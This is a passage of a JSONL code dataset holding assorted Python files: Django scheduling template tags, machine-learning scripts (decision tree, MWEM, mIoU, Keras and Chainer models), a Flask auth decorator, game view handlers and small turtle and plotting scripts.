skip_updates=False)","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":15313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"321588826","text":"from __future__ import division\nfrom six.moves.builtins import range\nimport datetime\n\nfrom schedule.conf.settings import CHECK_EVENT_PERM_FUNC, CHECK_CALENDAR_PERM_FUNC, SCHEDULER_PREVNEXT_LIMIT_SECONDS\n\n\nfrom schedule.templatetags.scheduletags import register\n\n@register.inclusion_tag(\"schedule/_daily_table.html\", takes_context=True)\ndef daily_table(context, day, start=1, end=24, increment=60):\n \"\"\"\n Display a nice table with occurrences and action buttons.\n Arguments:\n start - hour at which the day starts\n end - hour at which the day ends\n increment - size of a time slot (in minutes)\n \"\"\"\n user = context['request'].user\n addable = CHECK_EVENT_PERM_FUNC(None, user)\n if 'calendar' in context:\n addable &= CHECK_CALENDAR_PERM_FUNC(context['calendar'], user)\n context['addable'] = addable\n\n day_part = day.get_time_slot(day.start + datetime.timedelta(hours=start), day.start + datetime.timedelta(hours=end))\n # get slots to display on the left\n slots = _cook_slots(day_part, increment)\n context['slots'] = slots\n return context\n\n\ndef _cook_slots(period, increment):\n \"\"\"\n Prepare slots to be displayed on the left hand side\n calculate dimensions (in px) for each slot.\n Arguments:\n period - time period for the whole series\n increment - slot size in minutes\n \"\"\"\n tdiff = datetime.timedelta(minutes=increment)\n if (period.end - period.start).seconds:\n num = (period.end - period.start).seconds // tdiff.seconds\n else:\n num = 24 # hours in a day\n s = period.start\n slots = []\n for i in range(num):\n sl = period.get_time_slot(s, s + tdiff)\n slots.append(sl)\n s = s + tdiff\n return slots\n","sub_path":"templatetags/templatetags/scheduletags.py","file_name":"scheduletags.py","file_ext":"py","file_size_in_byte":1754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"260683053","text":"import pandas as pd \r\nimport numpy as np \r\nimport matplotlib.pyplot as plt \r\nfrom sklearn.tree import DecisionTreeClassifier,plot_tree \r\nfrom sklearn.model_selection import train_test_split \r\nfrom sklearn.metrics import confusion_matrix, 
plot_confusion_matrix,accuracy_score\r\ndf=pd.read_csv(\"zoo_data.csv\",header=None)\r\n\r\nprint(df.dtypes)\r\nprint(df[16].unique())\r\ny=df[16]\r\nX=df.drop(16, axis=1)\r\nprint(X.head())\r\nprint(y.unique())\r\nfor i in range(len(y)):\r\n if y[i] <= 4:\r\n y[i]=0\r\n else:\r\n y[i]=1\r\nprint(\"imp\")\r\nprint(y.unique()) \r\nX_train, X_test, y_train, y_test = train_test_split(X, y, random_state=72,test_size=0.35)\r\nclf_dt = DecisionTreeClassifier(criterion='entropy',random_state=72)\r\nclf_dt = clf_dt.fit(X_train, y_train)\r\ny_pred=clf_dt.predict(X_test)\r\nprint(accuracy_score(y_pred,y_test)*100)\r\nprint(confusion_matrix(y_test, y_pred))\r\nplot_confusion_matrix(clf_dt, X_test, y_test)\r\nplt.figure(figsize=(15,7.5))\r\nplot_tree(clf_dt,class_names=[\"No\", \"Yes\"],feature_names=X.columns)","sub_path":"decisiontree.py","file_name":"decisiontree.py","file_ext":"py","file_size_in_byte":1015,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"187720907","text":"#MWEM_main.py\r\n#William Sexton\r\n#2/20/2017\r\n\r\n\"\"\"Implemation of Multiplicative Weights Exponential Mechanism algorithm\"\"\"\r\n\r\n#imports\r\nimport logging\r\nimport sys\r\nimport numpy as np\r\nfrom scipy import sparse\r\nfrom scipy import stats\r\nimport csv\r\nfrom data import Data\r\nimport MWEM\r\nimport query\r\n\r\n\r\ndef round_info(n,dimChi,epsilon,queries,data,mwemState,Q,iterations):\r\n logging.info('Worst error (relative to n): %s',np.max(abs(queries*(data-mwemState))/n))\r\n logging.info('MSE (relative to n): %s',np.sum(np.power((queries*(data-mwemState)/n),2)))\r\n logging.info('mean in synthetic histogram=%s',np.mean(mwemState))\r\n logging.info('mean in true histogram=%s',np.mean(data))\r\n logging.info('Std. Dev. in synthetic histogram=%s',np.std(mwemState))\r\n logging.info('Std. Dev. 
in true histogram=%s',np.std(data))\r\n    A=data+np.finfo(float).eps\r\n    B=mwemState+np.finfo(float).eps\r\n    logging.info('KL Divergence=%s', stats.entropy(A/np.sum(A),B/np.sum(B)))\r\n    guarantee=2*n*np.sqrt(np.log(dimChi)/iterations)+10*iterations*np.log(Q)/epsilon\r\n    logging.info('error guarantee (relative to n): %s', guarantee/n)\r\n    \r\n\r\ndef main():\r\n    \"\"\"Configure log\"\"\"\r\n    #Change filename to start new log otherwise info will append to current log\r\n    logging.basicConfig(filename='MWEMacs.log',format='%(asctime)s %(message)s', level=logging.INFO)\r\n    logging.info('Started')\r\n    \r\n    \"\"\"load data\"\"\"\r\n    #Read data from csv file.\r\n    logging.info('Reading file %s',sys.argv[1])\r\n    data=Data(sys.argv[1])\r\n    n=data.n\r\n    dimChi=data.dimChi\r\n    logging.info('File loaded')\r\n    \r\n    \"\"\"Generate Queries\"\"\"\r\n    logging.info('Generating queries')\r\n    queries=query.build_queries(data.db,dimChi)\r\n    Q=queries.shape[0]\r\n    logging.info('Queries generated')\r\n    \r\n    \"\"\"algorithm parameters\"\"\"\r\n    #iterations=round(((n*np.sqrt(np.log2(dimChi))*epsilon)/(10*np.log2(Q)))**(float(2)/3)) #optimal T from HLM\r\n    iterations=3159\r\n    repetitions=3\r\n    data=data.hist\r\n    n=np.sum(data)\r\n    dim=np.size(data)\r\n    samples=30\r\n    \r\n    \"\"\"epsilon grid\"\"\"\r\n    #grid_size=10\r\n    #eps_grid=np.cumsum((1/float(grid_size))*np.ones(grid_size))\r\n    eps_grid=[.0442] #for custom grid or single value\r\n    grid_size=len(eps_grid)\r\n    \r\n    kl_measurements=np.zeros(grid_size)\r\n    mse_measurements=np.zeros(grid_size)\r\n    max_error_measurements=np.zeros(grid_size)\r\n    \r\n    \"\"\"Log parameters\"\"\"\r\n    logging.info('Sample size=%s',n)\r\n    logging.info('Size of universe=%s',dimChi)\r\n    logging.info('Iterations=%s',iterations)\r\n    logging.info('Samples=%s',samples)\r\n\r\n    \"\"\"run MWEM\"\"\"\r\n    #Generate samples for specified epsilon levels\r\n    logging.info('Running MWEM')\r\n    for samp in range(samples):\r\n        for e in range(grid_size):\r\n            epsilon=eps_grid[e]\r\n            logging.info('epsilon=%s',epsilon)\r\n            mwemState=MWEM.MWEM(data,n,dim,queries,iterations,repetitions,epsilon)\r\n            A=data+np.finfo(float).eps\r\n            B=mwemState+np.finfo(float).eps\r\n            round_info(n,dimChi,epsilon,queries,data,mwemState,Q,iterations)\r\n            kl_measurements[e]=stats.entropy(A/np.sum(A),B/np.sum(B))\r\n            max_error_measurements[e]=np.max(abs(queries*(data-mwemState))/n)\r\n            mse_measurements[e]=np.sum(np.power((queries*(data-mwemState)/n),2))\r\n    \r\n    \r\n    \r\n    logging.debug('kl_measurements: %s', kl_measurements)\r\n    logging.debug('max_error: %s', max_error_measurements)\r\n    logging.debug('mse: %s', mse_measurements)\r\n    \r\n    #Save output to csv files\r\n    #With each run of program, new sample data will be appended to the output files unless file names are changed\r\n    with open('ACS_kl_measurements.csv','ab') as ofile:\r\n        writer=csv.writer(ofile)\r\n        writer.writerow(kl_measurements)\r\n    with open('ACS_max_error_measurements.csv','ab') as ofile:\r\n        writer=csv.writer(ofile)\r\n        writer.writerow(max_error_measurements)\r\n    with open('ACS_mse_measurements.csv','ab') as ofile:\r\n        writer=csv.writer(ofile)\r\n        writer.writerow(mse_measurements)\r\n    logging.info('Finished')\r\n    \r\n    \r\nif __name__ == '__main__':\r\n    np.random.seed(535)\r\n    main()\r\n    \r\n    \r\n    \r\n","sub_path":"programs/analysis/03_ACS_Income_MWEM/MWEM_main.py","file_name":"MWEM_main.py","file_ext":"py","file_size_in_byte":4268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"194382752","text":"from functools import 
wraps\nfrom flask import request, current_app\n\nfrom ..service.auth_service import decode_token, split_bearer_token\nfrom ..util.exception import AuthenticationError, Forbidden, RequestError\n\n\ndef token_required(key, *permissions):\n \"\"\"\n :param key: the key for the resource being protected eg. user, portfolio\n :param permissions: list of permissions eg. login, reset, verify\n :return:\n \"\"\"\n def token_required(f):\n @wraps(f)\n def decorated(*args, **kwargs):\n if not current_app.config['AUTH']:\n return f(*args, **kwargs)\n\n token = split_bearer_token(request.headers.get('Authorization'))\n payload = decode_token(token)\n\n if not payload.get('type') in permissions:\n raise AuthenticationError\n\n token_id = payload.get(key)\n if not token_id:\n raise AuthenticationError\n\n resource_public_id = kwargs.get(f'{key}_public_id')\n if not resource_public_id:\n raise RequestError\n\n if not token_id == resource_public_id:\n raise Forbidden\n\n return f(*args, **kwargs)\n\n return decorated\n\n return token_required\n","sub_path":"api/main/util/decorator.py","file_name":"decorator.py","file_ext":"py","file_size_in_byte":1245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"338985821","text":"# -*- coding: utf-8 -*-\n\n__author__ = 'Wang Chao'\n__date__ = '4/9/14'\n\nfrom core.stage import Stage, Hang, EliteStage, ActivityStage\nfrom core.attachment import standard_drop_to_attachment_protomsg\nfrom libs import pack_msg\nfrom utils.decorate import message_response, operate_guard, function_check\nfrom preset.data import STAGE_ACTIVITY\nfrom preset.settings import OPERATE_INTERVAL_PVE, OPERATE_INTERVAL_PVE_ELITE\n\nimport protomsg\n\n\n@message_response(\"ActivityStagePVEResponse\")\ndef activity_pve(request):\n req = request._proto\n stage = ActivityStage(request._char_id)\n\n s = STAGE_ACTIVITY[req.stage_id]\n if s.tp == 1:\n battle_msg = stage.battle_type_one(req.stage_id)\n else:\n battle_msg = stage.battle_type_two(req.stage_id)\n\n if battle_msg.self_win:\n drop = stage.save_drop()\n else:\n drop = {}\n\n response = protomsg.ActivityStagePVEResponse()\n response.ret = 0\n response.stage_id = req.stage_id\n response.battle.MergeFrom(battle_msg)\n if drop:\n response.drop.MergeFrom(standard_drop_to_attachment_protomsg(drop))\n\n return pack_msg(response)\n\n\n\n@message_response(\"ElitePVEResponse\")\n@operate_guard('elite_pve', OPERATE_INTERVAL_PVE_ELITE, keep_result=False)\n@function_check(11)\ndef elite_pve(request):\n req = request._proto\n stage = EliteStage(request._char_id)\n\n battle_msg = stage.battle(req.stage_id)\n if battle_msg.self_win:\n drop = stage.save_drop()\n else:\n drop = {}\n\n response = protomsg.ElitePVEResponse()\n response.ret = 0\n response.stage_id = req.stage_id\n response.battle.MergeFrom(battle_msg)\n if drop:\n response.drop.MergeFrom(standard_drop_to_attachment_protomsg(drop))\n\n return pack_msg(response)\n\n\n\n@message_response(\"PVEResponse\")\n@operate_guard('pve', OPERATE_INTERVAL_PVE, keep_result=False)\ndef pve(request):\n req = request._proto\n stage = Stage(request._char_id)\n battle_msg = stage.battle(req.stage_id)\n\n if battle_msg.self_win:\n drop = stage.save_drop(req.stage_id, first=stage.first, star=stage.first_star)\n else:\n drop = {}\n\n response = protomsg.PVEResponse()\n response.ret = 0\n response.stage_id = req.stage_id\n response.battle.MergeFrom(battle_msg)\n if drop:\n response.drop.MergeFrom(standard_drop_to_attachment_protomsg(drop))\n\n return 
pack_msg(response)\n\n\n@message_response(\"HangResponse\")\n@function_check(7)\ndef hang_start(request):\n req = request._proto\n char_id = request._char_id\n\n hang = Hang(char_id)\n hang.start(req.stage_id)\n return None\n\n\n@message_response(\"HangCancelResponse\")\ndef hang_cancel(request):\n hang = Hang(request._char_id)\n hang.cancel()\n\n return None\n\n","sub_path":"sanguo/views/stage/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"349711751","text":"import numpy as np\r\nimport torch\r\nimport cv2\r\nimport glob\r\nimport os\r\n\r\ngts=glob.glob('./CamVid/testtarget_changed/*.png')\r\niou_array=glob.glob('./CamVid/Prediction/test/model9/*.png')\r\n\r\n# gts=glob.glob('./CamVid/traintarget_changed/*.png')\r\n# iou_array=glob.glob('./CamVid/Prediction/train/*.png')\r\n\r\n# gts=glob.glob('./CamVid/valtarget_changed/*.png')\r\n# iou_array=glob.glob('./CamVid/Prediction/val/*.png')\r\n\r\n# gts=glob.glob('./CamVid/real_annotation_changed/*.png')\r\n# iou_array=glob.glob('./DJI_Test/*.jpg')\r\n\r\ndef iou_mean(pred, target, n_classes = 7):\r\n\r\n ious = []\r\n iousSum = 0\r\n pred = torch.from_numpy(pred)\r\n pred = pred.view(-1)\r\n\r\n target = np.array(target)\r\n target = torch.from_numpy(target)\r\n target = target.view(-1)\r\n\r\n\r\n for cls in range(0, n_classes):\r\n pred_inds = pred == cls\r\n\r\n target_inds = target == cls\r\n\r\n intersection = (pred_inds[target_inds]).long().sum().data.cpu().item()\r\n\r\n union = pred_inds.long().sum().data.cpu().item() + target_inds.long().sum().data.cpu().item() - intersection\r\n\r\n if union == 0:\r\n ious.append(float('nan'))\r\n n_classes=n_classes-1\r\n else:\r\n ious.append(float(intersection) / float(max(union, 1)))\r\n iousSum += float(intersection) / float(max(union, 1))\r\n return iousSum/n_classes\r\n\r\n# for i in range(len(gts)):\r\n# pred=cv2.imread(iou_array[i])\r\n# gt=cv2.imread(gts[i])\r\n# pred=pred.transpose((2,0,1))\r\n# gt=gt.transpose((2,0,1))\r\n# pred=pred[0]\r\n# gt=gt[0]\r\n# print(iou_mean(pred,gt,7))\r\nchange_anno2=[0,1,2,3,4,5,6,7]\r\n\r\ncmap2=[[64, 0, 128],\r\n [128, 64, 128],\r\n [0, 0, 192],\r\n [128, 128, 0],\r\n [64, 64, 0],\r\n [128, 0, 0],\r\n [192, 192, 128],\r\n [0,0,0]]\r\n\r\ncmap2=np.array(cmap2)\r\n\r\nimages_miou=0\r\n\r\nsize=(360,480)\r\nsize2=(2160,3840)\r\n\r\nfor l in range(len(gts)):\r\n pred=cv2.imread(iou_array[l])\r\n gt=cv2.imread(gts[l])\r\n\r\n pred2=np.zeros(size)\r\n gt2=np.zeros(size)\r\n\r\n for i in range(pred.shape[0]):\r\n for j in range(pred.shape[1]):\r\n if((pred[i][j]==cmap2[0]).all()):\r\n pred2[i][j]=0\r\n elif ((pred[i][j] == cmap2[1]).all()):\r\n pred2[i][j] = 1\r\n elif ((pred[i][j] == cmap2[2]).all()):\r\n pred2[i][j] = 2\r\n elif ((pred[i][j] == cmap2[3]).all()):\r\n pred2[i][j] = 3\r\n elif ((pred[i][j] == cmap2[4]).all()):\r\n pred2[i][j] = 4\r\n elif ((pred[i][j] == cmap2[5]).all()):\r\n pred2[i][j] = 5\r\n elif ((pred[i][j] == cmap2[6]).all()):\r\n pred2[i][j] = 6\r\n elif ((pred[i][j] == cmap2[7]).all()):\r\n pred2[i][j] = 7\r\n if ((gt[i][j] == cmap2[0]).all()):\r\n gt2[i][j] = 0\r\n elif ((gt[i][j] == cmap2[1]).all()):\r\n gt2[i][j] = 1\r\n elif ((gt[i][j] == cmap2[2]).all()):\r\n gt2[i][j] = 2\r\n elif ((gt[i][j] == cmap2[3]).all()):\r\n gt2[i][j] = 3\r\n elif ((gt[i][j] == cmap2[4]).all()):\r\n gt2[i][j] = 4\r\n elif ((gt[i][j] == cmap2[5]).all()):\r\n gt2[i][j] = 5\r\n elif ((gt[i][j] == cmap2[6]).all()):\r\n gt2[i][j] 
= 6\r\n        elif ((gt[i][j] == cmap2[7]).all()):\r\n            gt2[i][j] = 7\r\n    print(f'{l} : {iou_mean(pred2,gt2)}')\r\n    images_miou+=iou_mean(pred2,gt2)\r\nprint('---')\r\nprint(images_miou/len(gts))","sub_path":"mIOU.py","file_name":"mIOU.py","file_ext":"py","file_size_in_byte":3511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"441375128","text":"from stable_baselines.common.env_checker import check_env\nfrom simple_SIR_env import simple_SIR_env\n\n# Initiate the env\nS0 = 999   # number of susceptibles at time = 0\nI0 = 1     # number of infected at time = 0\nR0 = 0     # number of recovered (and immune) at time = 0\nhospitalCapacity = 300 # maximum number of people in the ICU\nenv = simple_SIR_env(S0, I0, R0, hospitalCapacity)\n\n# Check the environment\ncheck_env(env)\n\n'''\nNote: you may get many warnings about future versions of some python packages,\nbut from my experience, you can ignore these warnings. Will work on resolving\nthis.\n'''\n","sub_path":"COVID19_env/check_env.py","file_name":"check_env.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"215086940","text":"import turtle \nUP = 0\nLEFT = 1\nDOWN = 2\nRIGHT = 3\ndirection = UP\nUP_ARROW = \"Up\"\nLEFT_ARROW = \"Left\"\nDOWN_ARROW = \"Down\"\nRIGHT_ARROW = \"Right\"\nSPACE_BAR = \"space\"\ndef up():\n    global direction\n    direction = UP\n    print(\"you pressed up\")\n    turtle.pos()\n    old_pos = turtle.pos()\n    x= old_pos[0]\n    y= old_pos[1]\n    turtle.goto(x , y+10)\n    print(turtle.pos())\ndef down():\n    global direction\n    direction = DOWN\n    print(\"you pressed down\")\n    turtle.pos()\n    old_pos = turtle.pos()\n    x= old_pos[0]\n    y= old_pos[1]\n    turtle.goto(x , y-10)\n    print(turtle.pos())\n    \ndef left ():\n    global direction\n    direction = LEFT\n    print(\"you pressed left\")\n    turtle.pos()\n    old_pos = turtle.pos()\n    x= old_pos[0]\n    y= old_pos[1]\n    turtle.goto(x -10,y)\n    print(turtle.pos())\ndef right ():\n    global direction\n    direction = RIGHT\n    print(\"you pressed right\")\n    turtle.pos()\n    old_pos = turtle.pos()\n    x= old_pos[0]\n    y= old_pos[1]\n    turtle.goto(x+10 , y)\n    print(turtle.pos())\n    \nturtle.onkeypress(up,UP_ARROW)\nturtle.onkeypress(down,DOWN_ARROW)\nturtle.onkeypress(left,LEFT_ARROW)\nturtle.onkeypress(right,RIGHT_ARROW)\nturtle.onkeypress(turtle.stamp, SPACE_BAR)\nturtle.listen()\n","sub_path":"funturtle2.py","file_name":"funturtle2.py","file_ext":"py","file_size_in_byte":1215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"387261532","text":"from keras.utils import np_utils\nfrom keras.models import Sequential\nfrom keras.layers.core import Dense, Dropout, Activation, Flatten\nfrom keras.layers.convolutional import Conv2D, MaxPooling2D\nfrom keras.optimizers import SGD, Adam, RMSprop\n\n\n# Define the network\nclass Net:\n    @staticmethod\n    def build(input_shape, classes):\n        # conv - conv - maxpool - dropout - conv - conv - maxpool - dense - dropout - dense\n        model = Sequential()\n\n        # 1) conv\n        model.add(Conv2D(filters=32, kernel_size=3, padding=\"same\", input_shape=input_shape))\n        model.add(Activation(\"relu\"))\n\n        # 2) conv\n        model.add(Conv2D(filters=32, kernel_size=3, padding=\"same\"))\n        model.add(Activation(\"relu\"))\n\n        # 3) maxpool\n        model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))\n\n        # 4) dropout\n        model.add(Dropout(0.25))\n\n        # 5) conv\n        model.add(Conv2D(filters=64, kernel_size=3, padding=\"same\"))\n        model.add(Activation(\"relu\"))\n\n        # 6) conv\n        model.add(Conv2D(filters=64, kernel_size=3, padding=\"same\"))\n        model.add(Activation(\"relu\"))\n\n        # 7) maxpool\n        model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))\n        model.add(Dropout(0.25))\n\n        # 8) dense\n        model.add(Flatten())\n        model.add(Dense(512))\n        model.add(Activation(\"relu\"))\n\n        # 9) dropout\n        model.add(Dropout(0.5))\n\n        # 10) dense\n        model.add(Dense(classes))\n\n        # 11) output\n        model.add(Activation(\"softmax\"))\n        model.summary()\n\n        # 12) return the model\n        return model","sub_path":"network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":1601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"586416753","text":"__author__ = 'LuizArthur'\r\n\r\nimport os\r\nimport time\r\nimport Calc\r\nimport matplotlib.pyplot as pp\r\n\r\n# time.clock() was removed in Python 3.8; use perf_counter() for wall-clock timing\r\ntempo = time.perf_counter()\r\n\r\nmain = os.getcwd()\r\nInput = os.path.join(main, \"Input\")\r\nOutput = os.path.join(main, \"Output\")\r\n\r\nif not os.path.exists(Output):\r\n    os.mkdir(Output)\r\n\r\nfile_name = []\r\nfile_initiate_name = os.path.join(Input, \"Input.txt\")\r\nfile_initiate = open(file_initiate_name, \"r\")\r\n\r\nfor line in file_initiate:\r\n    file_name.append(line.strip().split(\" \"))\r\n\r\nfile_initiate.close()\r\n\r\ncount_plot = 0\r\n\r\nfor name in file_name[0]:\r\n    #print(name)\r\n    path_name = os.path.join(Input, name)\r\n    #print(path_name)\r\n    if os.path.exists(path_name):\r\n        with open(path_name) as file:\r\n            Var_txt = []\r\n            for line in file:\r\n                Var_txt.append(line.strip().split(\" \"))\r\n\r\n            file.close()\r\n\r\n        calc = Calc.CALC(Var_txt, count_plot, name)\r\n        count_plot = calc.show_count_plot()\r\n    else:\r\n        print(\"File \"+path_name+\" does not exist\")\r\n\r\nprint(\"\\nExecution time: \", time.perf_counter()-tempo)\r\npp.show()\r\n","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"142256659","text":"#!/usr/bin/env python\nimport numpy\n\nimport chainer\nfrom chainer.backends import cuda\nimport chainer.functions as F\nimport chainer.links as L\nfrom chainer import Variable\nimport numpy as np\n\n\ndef add_noise(h, sigma=0.1):\n    xp = chainer.cuda.get_array_module(h.data)\n    return h + sigma * xp.random.randn(*h.data.shape)\n\n\nclass conv_Layer(chainer.Chain):\n    def __init__(self, ch_in, ch_out, ksize=(5, 1), stride=(1, 1), pad=(2, 0), wscale=0.02, normalize=False):\n        w = chainer.initializers.Normal(wscale)\n        super(conv_Layer, self).__init__(\n            conv = L.Convolution2D(ch_in, ch_out, ksize, stride, pad, initialW=w),\n            bn = L.BatchNormalization(ch_out)\n        )\n        self.normalize = normalize\n\n    def __call__(self, x):\n        h = x\n        h = self.conv(h)\n        if self.normalize:\n            h = self.bn(h)\n        return h\n\n\nclass deconv_Layer(chainer.Chain):\n    def __init__(self, ch_in, ch_out, ksize=(3, 1), stride=(1, 1), pad=(2, 0), wscale=0.02, normalize=False):\n        w = chainer.initializers.Normal(wscale)\n        super(deconv_Layer, self).__init__(\n            deconv = L.Deconvolution2D(ch_in, ch_out, ksize, stride, pad, initialW=w),\n            bn = L.BatchNormalization(ch_out)\n        )\n        self.normalize = normalize\n\n    def __call__(self, x):\n        h = x\n        h = self.deconv(h)\n        if self.normalize:\n            h = self.bn(h)\n        return h\n\nclass GFirstBlock(chainer.Chain):\n    def __init__(self, ch_in, ch_out, outsize):\n        super(GFirstBlock, self).__init__(\n            c0 = conv_Layer(ch_in, ch_in, ksize=(3, 3), stride=(1, 3), pad=(1, 1), normalize=True),\n            c1 = conv_Layer(ch_in, ch_out, ksize=(3, 32), stride=(1, 1), pad=(1, 0), normalize=True),\n            l0 = L.Linear(None, ch_out * 2),\n            dc0 = deconv_Layer(ch_out // 32, ch_out, ksize=(4, 1), stride=(2, 1), pad=(1, 0), normalize=True),\n            dc1 = deconv_Layer(ch_out, ch_out, ksize=(3, 3), stride=(1, 3), pad=(1, 0), normalize=True),\n            c2 = conv_Layer(ch_out, 1, ksize=(3, 1), stride=(1, 1), pad=(1, 0),normalize=True),\n        )\n        self.ch_in = ch_in\n        self.ch_out = ch_out\n        self.outsize = outsize\n\n    def __call__(self, x, z, last=False):\n        l0 = F.leaky_relu(self.c0(x))\n        l1 = F.leaky_relu(self.c1(l0))\n        l1 = F.reshape(l1, (l1.shape[0], self.ch_out // 32, l1.shape[2], 32))\n        l2 = l1 + F.reshape(self.l0(z), (l1.shape[0], l1.shape[1], l1.shape[2], l1.shape[3]))\n        l3 = F.leaky_relu(self.dc0(l2)) #upsampling\n        if last:\n            return self.c2(F.leaky_relu(self.dc1(l3)))\n        return l3\n\nclass GBlock(chainer.Chain):\n    def __init__(self, ch_in, ch_out, outsize):\n        super(GBlock, self).__init__(\n            #c0 = conv_Layer(ch_in, ch_in, ksize=(3, 3), stride=(1, 3), pad=(1, 1), normalize=True),\n            c1 = conv_Layer(ch_in, ch_out, ksize=(3, 32), stride=(1, 1), pad=(1, 0), normalize=True),\n            dc0 = deconv_Layer(ch_out // 32, ch_out, ksize=(4, 1), stride=(2, 1), pad=(1, 0), normalize=True),\n            dc1 = deconv_Layer(ch_out, ch_out, ksize=(3, 3), stride=(1, 3), pad=(1, 0), normalize=True),\n            c2 = conv_Layer(ch_out, 1, ksize=(3, 1), stride=(1, 1), pad=(1, 0),normalize=True),\n        )\n        self.ch_in = ch_in\n        self.ch_out = ch_out\n        self.outsize = outsize\n\n    def __call__(self, x, z, last=False):\n        #l0 = F.leaky_relu(self.c0(x))\n        #input shape is (batch, ch_in, length, 32)\n        l1 = F.leaky_relu(self.c1(x))\n        l1 = F.reshape(l1, (l1.shape[0], self.ch_out // 32, l1.shape[2], 32))\n        l2 = F.leaky_relu(self.dc0(l1)) #upsampling\n        if last:\n            return self.c2(F.leaky_relu(self.dc1(l2)))\n        return l2\n\n\nclass Generator(chainer.Chain):\n    def __init__(self, depth, top_ch = 64):\n        super(Generator, self).__init__(\n            b0 = GFirstBlock(1, top_ch, (4, 32)),\n            b1 = GBlock(top_ch, top_ch, (8, 32)),\n            b2 = GBlock(top_ch, top_ch // 2, (16, 32)),\n            b3 = GBlock(top_ch // 2, top_ch // 2, (32, 32)),\n            b4 = GBlock(top_ch // 2, top_ch // 2, (64, 32)),\n            b5 = GBlock(top_ch // 2, top_ch // 2, (128, 32)),\n            b6 = GBlock(top_ch // 2, top_ch // 2, (256, 32)),\n        )\n\n        self.depth = depth\n\n    def make_hidden(self, sz):\n        z = self.xp.random.randn(sz, 128, 1, 1).astype('float32')\n        return z\n\n    def __call__(self, x, z, alpha=1.0):\n        if self.depth > 0 and alpha < 1.0:\n            h = x #x = keypose\n            for i in range(self.depth-1):\n                h = self['b%d'%i](h, z)\n\n            h1 = self['b%d'%(self.depth-1)](h, z)\n            h2 = F.unpooling_2d(h1, (2, 1), (2, 1), outsize=self['b%d'%self.depth].outsize)\n            # parenthesize (self.depth-1) so the index is computed before formatting\n            h3 = self['b%d'%(self.depth-1)].c2(F.leaky_relu(self['b%d'%(self.depth-1)].dc1(h2)))\n            h4 = self['b%d'%self.depth](h1, z, True)\n            h = h3 * (1 - alpha) + h4 * alpha\n        else:\n            h = x\n            for i in range(self.depth):\n                h = self['b%d'%i](h, z)\n            h = self['b%d'%self.depth](h, z, True)\n        h = F.concat((F.reshape(x[:,:,0,:], (x.shape[0],x.shape[1],1,x.shape[3])), h[:,:,1:,:]), axis=2)\n        h = F.concat((h[:,:,:h.shape[2]-1,:], F.reshape(x[:,:,1,:], (x.shape[0],x.shape[1],1,x.shape[3]))), axis=2)\n        return h\n\nclass DBlock(chainer.Chain):\n    def __init__(self, ch_in, ch_out):\n        super(DBlock, self).__init__(\n            c0_0 = conv_Layer(1, ch_in, ksize=(3, 3), stride=(1, 3), pad=(1, 1), normalize=False),\n            c0_1 = conv_Layer(ch_in, ch_in, ksize=(3, 3), stride=(1, 1), pad=(1, 1), normalize=False),\n            c1 = conv_Layer(ch_in, ch_out, ksize=(3, 32), stride=(1, 1), pad=(1, 0), normalize=False),\n            c2 = conv_Layer(ch_out // 32, ch_out, 
ksize=(3, 1), stride=(2, 1), pad=(1, 0),normalize=False),\n )\n self.ch_in = ch_in\n self.ch_out = ch_out\n\n def __call__(self, x, first=False):\n if first:\n l0 = F.leaky_relu(self.c0_0(x))\n else:\n l0 = F.leaky_relu(self.c0_1(x))\n l1 = F.leaky_relu(self.c1(l0))\n l2 = F.reshape(l1, (l1.shape[0], self.ch_out // 32, l1.shape[2], 32))\n l3 = F.leaky_relu(self.c2(l2))\n return l3\n\nclass DLastBlock(chainer.Chain):\n def __init__(self, ch_in, ch_out):\n super(DLastBlock, self).__init__(\n c0_0 = conv_Layer(1, ch_in, ksize=(3, 3), stride=(1, 3), pad=(1, 1), normalize=False),\n c0_1 = conv_Layer(ch_in, ch_in, ksize=(3, 3), stride=(1, 1), pad=(1, 1), normalize=False),\n c1 = conv_Layer(ch_in, ch_out, ksize=(3, 32), stride=(1, 1), pad=(1, 0), normalize=False),\n c2 = conv_Layer(ch_out // 32, ch_out, ksize=(3, 1), stride=(2, 1), pad=(1, 0),normalize=False),\n #stddev = MinibatchStddev(ch_in),\n )\n self.ch_in = ch_in\n self.ch_out = ch_out\n\n def __call__(self, x, first=False):\n if first:\n l0 = F.leaky_relu(self.c0_0(x))\n else:\n l0 = F.leaky_relu(self.c0_1(x))\n #l0 = self.stddev(l0)\n l1 = F.leaky_relu(self.c1(l0))\n l1 = F.reshape(l1, (l1.shape[0], self.ch_out // 32, l1.shape[2], 32))\n l2 = self.c2(l1)\n return l2\n\n\nclass Discriminator(chainer.Chain):\n def __init__(self, depth, wscale=0.02, top_ch = 32):\n w = chainer.initializers.Normal(wscale)\n super(Discriminator, self).__init__(\n b1 = DBlock(top_ch, top_ch),\n b2 = DBlock(top_ch, top_ch),\n b3 = DBlock(top_ch, top_ch * 2),\n b4 = DBlock(top_ch * 2, top_ch * 2),\n b5 = DBlock(top_ch * 2, top_ch * 4),\n b6 = DBlock(top_ch * 2, top_ch * 2),\n b7 = DLastBlock( top_ch * 2, top_ch * 2),\n l0 = L.Linear(None, 1, 